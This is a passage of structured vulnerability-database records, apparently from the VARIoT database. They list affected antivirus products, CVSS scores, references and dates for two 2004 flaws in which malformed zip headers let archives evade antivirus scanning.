"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0935"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0935",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9365",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0935",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-297",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9365",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9365"
},
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Eset Anti-Virus before 1.020 (16th September 2004) allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Eset Anti-Virus is an anti-virus software",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9365"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9365",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9365"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "NVD",
"id": "CVE-2004-0935",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9365",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9365"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"id": "VAR-200501-0311",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9365"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:29.100000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Eset AntiVirus zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146863"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0935"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9365"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9365"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9365"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9365"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-09T17:00:09.303000",
"db": "NVD",
"id": "CVE-2004-0935"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-297"
}
],
"trust": 0.6
}
}
VAR-200501-0243
Vulnerability from variot - Updated: 2023-12-18 12:40Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Archive::Zip does not properly parse Zip files and may incorrectly interpret malformed zip archives to contain zero length/size files. As a a result, anti-virus software using Archive::Zip may fail to detect malicious content within a Zip archive. Archive::Zip is a free perl module for working with zip compressed files. Archive::Zip versions prior to 1.14 have security bypass vulnerabilities when used in antivirus programs
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0243",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.82"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cpan",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
